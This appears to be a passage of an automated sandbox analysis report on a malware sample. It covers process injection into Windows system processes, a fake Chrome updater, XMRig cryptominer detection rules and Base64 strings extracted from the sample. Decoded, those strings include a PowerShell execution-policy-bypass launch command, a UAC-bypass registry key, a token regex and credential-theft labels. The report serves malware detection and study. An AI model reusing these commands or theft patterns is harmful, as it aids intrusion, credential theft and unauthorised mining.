Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C7382258	30_2_00000161C7382258
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C737FEF8	30_2_00000161C737FEF8
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C737BE3C	30_2_00000161C737BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91B20DC	31_2_00000233B91B20DC
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91BB030	31_2_00000233B91BB030
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91BF2F8	31_2_00000233B91BF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91BB23C	31_2_00000233B91BB23C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91C1658	31_2_00000233B91C1658
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91E2CDC	31_2_00000233B91E2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91EBC30	31_2_00000233B91EBC30
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91EFEF8	31_2_00000233B91EFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91EBE3C	31_2_00000233B91EBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91F2258	31_2_00000233B91F2258
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210918F20DC	32_2_00000210918F20DC
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210918FB030	32_2_00000210918FB030
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210918FF2F8	32_2_00000210918FF2F8
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210918FB23C	32_2_00000210918FB23C
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_0000021091901658	32_2_0000021091901658
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_0000021091922CDC	32_2_0000021091922CDC
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_000002109192BC30	32_2_000002109192BC30
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_000002109192FEF8	32_2_000002109192FEF8
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_000002109192BE3C	32_2_000002109192BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_0000021091932258	32_2_0000021091932258
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_00000210919620DC	32_2_00000210919620DC
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_000002109196B030	32_2_000002109196B030
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_000002109196F2F8	32_2_000002109196F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_000002109196B23C	32_2_000002109196B23C
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_0000021091971658	32_2_0000021091971658
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E96B030	33_2_000002062E96B030
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E9620DC	33_2_000002062E9620DC
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E96B23C	33_2_000002062E96B23C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E96F2F8	33_2_000002062E96F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E971658	33_2_000002062E971658
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E99BC30	33_2_000002062E99BC30
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E992CDC	33_2_000002062E992CDC
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E99BE3C	33_2_000002062E99BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E99FEF8	33_2_000002062E99FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E9A2258	33_2_000002062E9A2258
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8D7F2F8	34_2_00000282B8D7F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8D81658	34_2_00000282B8D81658
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8D7B030	34_2_00000282B8D7B030
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8D720DC	34_2_00000282B8D720DC
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8D7B23C	34_2_00000282B8D7B23C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DAFEF8	34_2_00000282B8DAFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DB2258	34_2_00000282B8DB2258
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DABC30	34_2_00000282B8DABC30
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DA2CDC	34_2_00000282B8DA2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DABE3C	34_2_00000282B8DABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B934BC30	34_2_00000282B934BC30
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B9352258	34_2_00000282B9352258
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B934FEF8	34_2_00000282B934FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B934BE3C	34_2_00000282B934BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B9342CDC	34_2_00000282B9342CDC
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000022856DC20DC	35_2_0000022856DC20DC
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000022856DCB030	35_2_0000022856DCB030
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000022856DCF2F8	35_2_0000022856DCF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000022856DCB23C	35_2_0000022856DCB23C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000022856DD1658	35_2_0000022856DD1658
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_000002285734BC30	35_2_000002285734BC30
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000022857342CDC	35_2_0000022857342CDC
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000022857352258	35_2_0000022857352258
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_000002285734BE3C	35_2_000002285734BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_000002285734FEF8	35_2_000002285734FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CCDB030	36_2_0000018F9CCDB030
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CCD20DC	36_2_0000018F9CCD20DC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CCDB23C	36_2_0000018F9CCDB23C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CCE1658	36_2_0000018F9CCE1658
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CCDF2F8	36_2_0000018F9CCDF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CD0BC30	36_2_0000018F9CD0BC30
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CD02CDC	36_2_0000018F9CD02CDC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CD0BE3C	36_2_0000018F9CD0BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CD12258	36_2_0000018F9CD12258
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CD0FEF8	36_2_0000018F9CD0FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC32CDC	37_2_00000207BAC32CDC
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC3BC30	37_2_00000207BAC3BC30
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC3FEF8	37_2_00000207BAC3FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC3BE3C	37_2_00000207BAC3BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC42258	37_2_00000207BAC42258
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9A1658	38_2_000001FBDB9A1658
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB99B23C	38_2_000001FBDB99B23C
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9920DC	38_2_000001FBDB9920DC
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB99B030	38_2_000001FBDB99B030
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB99F2F8	38_2_000001FBDB99F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9D2258	38_2_000001FBDB9D2258
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9CBE3C	38_2_000001FBDB9CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9C2CDC	38_2_000001FBDB9C2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9CBC30	38_2_000001FBDB9CBC30
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9CFEF8	38_2_000001FBDB9CFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000016F9CA0BC30	39_2_0000016F9CA0BC30
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000016F9CA02CDC	39_2_0000016F9CA02CDC
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000016F9CA0BE3C	39_2_0000016F9CA0BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000016F9CA12258	39_2_0000016F9CA12258
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000016F9CA0FEF8	39_2_0000016F9CA0FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A018020DC	40_2_0000027A018020DC
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A0180B030	40_2_0000027A0180B030
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A0180F2F8	40_2_0000027A0180F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A0180B23C	40_2_0000027A0180B23C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01811658	40_2_0000027A01811658
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01832CDC	40_2_0000027A01832CDC
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A0183BC30	40_2_0000027A0183BC30
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A0183FEF8	40_2_0000027A0183FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A0183BE3C	40_2_0000027A0183BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01842258	40_2_0000027A01842258
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01BD2CDC	40_2_0000027A01BD2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01BDBC30	40_2_0000027A01BDBC30
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01BDFEF8	40_2_0000027A01BDFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01BE2258	40_2_0000027A01BE2258
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01BDBE3C	40_2_0000027A01BDBE3C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0008B030	45_2_0008B030
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_000820DC	45_2_000820DC
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0008B23C	45_2_0008B23C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00091658	45_2_00091658
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0008F2F8	45_2_0008F2F8
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_001CB030	45_2_001CB030
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_001C20DC	45_2_001C20DC
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_001CB23C	45_2_001CB23C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_001D1658	45_2_001D1658
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_001CF2F8	45_2_001CF2F8
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0060B030	45_2_0060B030
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_006020DC	45_2_006020DC
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00611658	45_2_00611658
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0060B23C	45_2_0060B23C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0060F2F8	45_2_0060F2F8
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00822CDC	45_2_00822CDC
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0082BC30	45_2_0082BC30
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0082FEF8	45_2_0082FEF8
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0082BE3C	45_2_0082BE3C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00832258	45_2_00832258
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00B92CDC	45_2_00B92CDC
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00B9BC30	45_2_00B9BC30
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00B9FEF8	45_2_00B9FEF8
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00B9BE3C	45_2_00B9BE3C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00BA2258	45_2_00BA2258
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B26FEF8	47_2_000002992B26FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B26BE3C	47_2_000002992B26BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B272258	47_2_000002992B272258
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B262CDC	47_2_000002992B262CDC
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B26BC30	47_2_000002992B26BC30
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B2CFEF8	47_2_000002992B2CFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B2CBE3C	47_2_000002992B2CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B2D2258	47_2_000002992B2D2258
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B2C2CDC	47_2_000002992B2C2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B2CBC30	47_2_000002992B2CBC30

Source: Joe Sandbox View

Dropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8104 -s 2528

Source: jscseoeoqftm.tmp.3.dr

Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: updater.exe.3.dr	Static PE information: Number of sections : 14 > 10
Source: zxcvbnmasd.exe.0.dr	Static PE information: Number of sections : 14 > 10

Source: zufmUwylvo.exe, 00000000.00000000.1326239895.000001B66B564000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.exe" vs zufmUwylvo.exe
Source: zufmUwylvo.exe	Binary or memory string: OriginalFilenameSystem.exe" vs zufmUwylvo.exe

Source: 45.2.updater.exe.14001fa80.9.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 45.2.updater.exe.14001fa80.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 45.2.updater.exe.14001fa80.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 45.2.updater.exe.140040c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 45.2.updater.exe.140040c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 45.2.updater.exe.140040c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 45.2.updater.exe.140062860.8.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 45.2.updater.exe.140062860.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 45.2.updater.exe.140062860.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: updater.exe PID: 5804, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: zufmUwylvo.exe, DiybvPeeTbqiC.cs

Base64 encoded string: 'L2Mgc3RhcnQgL2IgcG93ZXJzaGVsbCDigJNFeGVjdXRpb25Qb2xpY3kgQnlwYXNzIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICci', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'QUNnYktLOG8veWpmS084b1Z5ajJLRElvUVNpQUtFQW9KQ2dzS0E4b0pTZ2tLQUFvUUNocEtKSW96aWk5S1A4byt5Z3ZLQjRvQVNnZ0FBPT0=', 'QUNnQUtBQW9BQ2lKS0Iwb0V5aTdLT1FvZUNnaktFQW9BQ2dBS0FBb0FDZ0FLQ0FvR2lqMEtING9YeWdKS0NNb1FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW80Q2p6S01Zb0ZDZ0pLQThvL3loRUtMRW81Q2lFS01Bb3BDajBLRWNvOENoZktLa29BU2dnS0hRb2Z5aEVLQUFvQUNnZ0FBPT0=', 'QUNnQUtLQW9BU2lBS0E0b0FDZ0FLQmdvL0NoL0tEc29HU2pOS01Bb1BDZzVLRjhvL3lqRUtNTW9BQ2dBS0Jnb1JDZ0lLRVFvQUNnZ0FBPT0=', 'QUNnQUtBY29nQ2pzS1BZbzdDaHJLSXNvZkNpM0tGY29nQ2lYS0Frb0p5aEFLTW9vdUNqbktORW85Q2p0S1BRbzlDaEVLRGdvQUNnZ0FBPT0=', 'QUNpNEtBQW9DQ2dKS0Jzb055aitLUDhveHlqdktPY295eWlKS0gwb0RTaVpLUDBvemlqL0tQOG9KeWdmS0Fzb0FTaEdLQUFvUkNnZ0FBPT0=', 'QUNpNEtJQW9RQ2dBS0lBb1lDZ1lLSWtvZnlqL0tQOG8veWhXS0FFb3NDai9LUDhvL3lqL0tFZ29FU2dpS01Bb0FDam5LRUFvUnlnZ0FBPT0=', 'QUNnWUtFNG9EeWdXS0JNb0VpZ1NLRG9vL3loSUtMY29neWdCS0FBb0RpZzhLSDRveVNqL0tBY29BQ2dBS0Fnb2dTZ0pLS3NvQUNnZ0FBPT0=', 'QUNnQUtLRW9BQ2dRS0VBb0FDZ0FLQUFvT1NqL0tPNG9JaWhIS0FBb3VDZ1FLUFVvdnlnTEtBQW9BQ2dBS0FBb0JpZ0FLRXdvQUNnZ0FBPT0=', 'QUNnQUtBQW9veWdBS0Fnb2hDZ0FLQUFvQUNnSUtCa29SeWhHS0JBb3VDaTRLQXNvQVNnQUtBQW9BQ2dBS0Fvb0FDaGNLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dSS01Rb0FDZ1JLSVFvUUNnQUtBQW8veWptS09RbzlDaitLQUFvQUNnQUtFQW9FQ2dCS09Bb0NpZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0Fnb0VpaWtLSDhvQ0NnUUtBQW9OQ2l0S1A4bzdTZ3VLQUFvRWlncEtQNG9aQ2dhS0FFb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQWdvRUNnQUtDUW9BQ2lJS1BZb1dDZ0FLQ1FvRkNnQ0tBRW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0Jrb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FDQUE=', 'Q1FBSkFEM1lzOXdnQUVNQWNnQmxBR1FBYVFCMEFFTUFZUUJ5QUdRQWN3QTZBQ0FB', 'Q1FBSkFEM1lGdDBnQUVJQWJ3QnZBR3NBYlFCaEFISUFhd0J6QURvQUlBQT0=', 'Q1FBSkFEM1k1dHdnQUVRQWJ3QjNBRzRBYkFCdkFHRUFaQUJ6QURvQUlBQT0=', 'Q1FBSkFEellxTjhnQUZJQVpRQnpBSFFBYndCeUFHVUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSkFEN1l5dDBnQUZjQVlRQnNBR3dBWlFCMEFITUFPZ0FnQUE9PQ==', 'Q1FCRUp3LytJQUJYQUdFQWJBQnNBR1VBZEFCekFDQUFRUUJ3QUhBQU9nQWdBQT09', 'Q1FBKzJLTGRJQUJRQUdrQVpBQm5BR2tBYmdBZ0FFRUFjQUJ3QURvQUlBQT0=', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSUp3LytJQUJVQUdVQWJBQmxBR2NBY2dCaEFHMEFJQUJ6QUdVQWN3QnpBR2tBYndCdUFITUE=', 'Q1FBQkpnLytJQUJUQUdzQWVRQndBR1VBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFkQUJ2QUdzQVpRQnVBQT09', 'Q1FBOTJLM2NJQUJUQUdrQVp3QnVBR0VBYkFBZ0FITUFaUUJ6QUhNQWFRQnZBRzRB', 'Q1FBODJLN2ZJQUJUQUhRQVpRQmhBRzBBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBODJLN2ZJQUJWQUhBQWJBQmhBSGtBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FDWkpnLytJQUJRQUhJQWJ3QmpBR1VBY3dCekFHVUFjd0E2QUNBQQ==', 'W1x3LV17MjQsMjZ9XC5bXHctXXs2fVwuW1x3LV17MjUsMTEwfXxtZmFcLlthLXpBLVowLTlfXC1dezg0fQ==', 'U29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3Ng==', 'U29mdHdhcmVcTWljcm9

Source: jscseoeoqftm.tmp.3.dr	Binary string: SOFTWARE\dialerconfigstartuppidprocess_namespathsservice_namestcp_localtcp_remoteudpNtQueryObjectntdll.dll\\?\NtQuerySystemInformationNtResumeThreadNtQueryDirectoryFileNtQueryDirectoryFileExNtEnumerateKeyNtEnumerateValueKeyEnumServiceGroupWadvapi32.dllEnumServicesStatusExWsechost.dllNtDeviceIoControlFile\\.\pipe\dialerchildproc64\\.\pipe\dialerchildproc32\\.\pipe\\Device\Nsidialer@
Source: Microsoft-Windows-SMBServer%4Operational.evtx.40.dr	Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.40.dr	Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.40.dr	Binary string: \Device\NetbiosSmb
Source: System.evtx.40.dr	Binary string: C:\Device\HarddiskVolume3
Source: System.evtx.40.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4n
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.40.dr	Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.40.dr	Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.40.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: System.evtx.40.dr	Binary string: C:\Device\HarddiskVolume3419-`
Source: System.evtx.40.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.40.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.40.dr	Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
